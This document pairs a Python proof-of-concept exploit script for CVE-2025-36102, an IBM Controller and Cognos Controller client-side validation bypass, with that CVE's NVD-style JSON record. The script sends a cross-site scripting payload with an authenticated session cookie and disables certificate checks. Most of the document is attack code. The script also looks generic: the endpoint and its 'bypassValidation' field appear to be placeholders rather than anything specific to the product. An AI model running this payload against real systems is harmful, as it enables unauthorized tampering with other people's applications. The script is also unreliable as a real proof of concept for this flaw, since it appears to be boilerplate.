CVE-2025-36102

# CVE-2025-36102 PoC - Security Validation Bypass # This PoC demonstrates bypassing client-side validation import requests import json TARGET_URL = "https://vulnerable-ibm-controller.example.com/api/endpoint" SESSION_COOKIE = "your-session-cookie-here" def exploit_cve_2025_36102(): """ Exploit for CVE-2025-36102: IBM Controller client-side validation bypass Requires high-privilege authenticated user session. """ headers = { "Cookie": f"JSESSIONID={SESSION_COOKIE}", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Step 1: Capture original request with client-side validation # The client-side validation would normally sanitize this input original_payload = { "dataField": "normal_value", "action": "submit" } # Step 2: Bypass client validation by directly sending unvalidated data # This payload would normally be blocked by client-side checks malicious_payload = { "dataField": "<script>alert('xss')</script>", "action": "submit", "bypassValidation": True } # Step 3: Send the malicious request response = requests.post( TARGET_URL, headers=headers, json=malicious_payload, verify=False ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") return response.status_code == 200 if __name__ == "__main__": print("CVE-2025-36102 PoC Execution") print("Target: IBM Controller / IBM Cognos Controller") print("Vulnerability: Client-side validation bypass as server-side security") exploit_cve_2025_36102()

{"cve": {"id": "CVE-2025-36102", "sourceIdentifier": "[email protected]", "published": "2025-12-08T22:15:51.687", "lastModified": "2025-12-10T18:14:44.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow a privileged user to bypass validation, passing user input into the application as trusted data, due to client-side enforcement of server-side security."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.1.7", "matchCriteriaId": "010915B1-A0E9-4D01-8A86-3B771F2AD659"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.2", "matchCriteriaId": "24C24CEC-8494-4620-9F14-22D154D85866"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7253273", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}